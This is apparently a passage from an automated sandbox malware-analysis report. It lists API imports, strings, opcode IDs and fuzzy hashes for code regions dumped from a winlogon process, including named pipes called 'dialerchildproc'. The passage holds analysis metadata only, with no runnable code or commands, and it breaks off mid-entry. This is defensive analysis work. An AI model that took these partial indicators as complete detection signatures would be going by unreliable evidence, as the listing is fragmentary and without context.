                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: ab4e86b80bad7de7d9fc3ab59b2f76ba8cf21dcb8283221406096f04f5b2af92
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: A9415D3024168786FAEBA73555553F926829BF67F0F280734BD36466EEDE2C9F018608
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: b1f9f93cb01f113d9316950de3058d2bf3c52726d10c2abd083118da5a752f1a
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 9B213D3261464286EB518B25E4443A963A0F7D9BE4F944325FEA903BE8CF7CC649CB04
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: 118cde429f331ccbb9c347859f0b6c357bc9266cc281f8d3d7d51a4fe7ca9d13
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: E4E19E3260474287EBA59FA5D4813ED77A1F7A57E8F100225FE6997B9ECB38C291C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD087
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F385BCC7DE,?,?,?,?,?,?,?,?,000001F385BCCF9D,?,?,00000001), ref: 000001F385BCD0F0
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 798ca2d8f1bf394026dd0354072af2df215992b6fdb75384f3c3813a05e348a0
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: 40618F3260421242FAEB8A64D4403B9BAA0A7E57F0F604635FD3A137ECEB3CCA418640
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 7d0dfc8a691413f4dde3a8332c91cc347d6227e1e938a84b6f8a2983f74cfa34
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: BE616A32600B858AEB51DF65D4403ED77A1F3A4BE8F044225EF9917B98DB38DA95C704
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: de6bc9e0d1430427b2a72eb52cbb69da6f06b7e4055c4c057576433a11f966a7
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 98515E36100282CBEBA98B9595443A877A0F3A5BE4F185325FE69C7BDDCB3CD690C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 634da43ffc88561904e9c766b05514423cef216fd51c5e43a622db91c593a43a
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: BB516132104382CAEBA68B1595443B977A0F3A5BE4F185325FF6947BD9EB3CD691C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: cdeba406e24003a3a0b1675a6f9d7472096d73f7c1ad2f2c69448a9297637e66
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: F0518F72100682CAEBA58F5594843A977A0F3A5BE5F144335FE6987BD9CB3CDE50C708
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: ba53dc36e80807c3e2d48e7356b2653b066ac3483705aa10495dd9823df6bc95
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: C351903271160287DB96CB55E454FA937A5F3A4BE8F508234FE26877CCEB38CA418B44
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: e304355abc066f96e17f3cd7cdfa1338fafb4ef0b8800f9706e494f0d0c637c8
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: E2519F326016028BDB96CB25E454BA93795F3A4BE8F508234FE26477CCFB38CA458704
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 284da866f2f5732ca223679ce680b25411ae6709bb61a3885cc83e3b25b646bf
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 1631903220164287EB96DF55E844BA93B64F390BE8F058224FE66837CCDB3CCA41CB44
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 1f122b48d9d6f5b20c7e8e545056d8ecb40dcf6bafc27ce726ad1e6dc5d3d349
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: D131907220164296E796DF11E8447A97764F7A0BE8F158234FE6A477CCEB3CCA40C704
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: 48194c91b75594280cb710552ccab9c4b6c9696179c88a7cdcdc75127d28105e
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: 9ED1AF32714A8189EB52CFA5D4402EC7BB1F7A47E8F148225EE6997BDDDA3CC606C740
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction ID: d3793489244d99d11474eaedf2291eb90a0db23d9d29e5d8d83fa4e484c9e938
                                                        • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction Fuzzy Hash: D701CC32600A92D6EB85DF62E8041AA63A0FBA9FD1F545130FE6903759DE38C610C740
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 219b268d2508d01396f34f1c17f2a067e3db346685af521888a3d4dc08d7a7f4
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: 1F91D73370069685FF969FA584403FDABA0F7A4BE8F544225EE1A576CCDA7CC542C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: 60e99ca984fe45c8205c3015f8f1e509e2abf101529f829098595df2463e0b0f
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: 6D71B13620078286EAA69F6598843FAA694F3E57E4F440236FD6953BCDDA3CCF458704
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 768f49f300d8609a6abab68202dda315b1d19df14fbc99aa50587f3a5c2b46f2
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 9E619B33600B858AEB65DFA5E0403ED77A1F394BE8F044226EF6957B98DB38D295C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 639785ff94cdbec34cdd26092e8e57918619dd365a49ed2093a17fdf676396e3
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 77617C33A00B458AEBA2DF65D4403ED7BA1F394BE8F144225EF6917B98EB38D655C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 72e056ba0e2456e91081c2497b6582406c8d111315e180d16f48c373d1f09fb1
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: 8C51D63220438382EEA69B69A1643FA9651F3E57E0F440235FEA903BCDCA3DCF048744
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: 7545201565cffb4dd9c12d3e017e1e4cb621b9b8cbb6a5680d551cdf74df0a63
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: F241BF32214A8182DBA28F65E8443F9A7A0F7A87E4F904231EE5D87788EB7CC641C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: 7feea5767932b83702a4603a4908a0b46db3a5e551aabef06720e3f0f0bcf91d
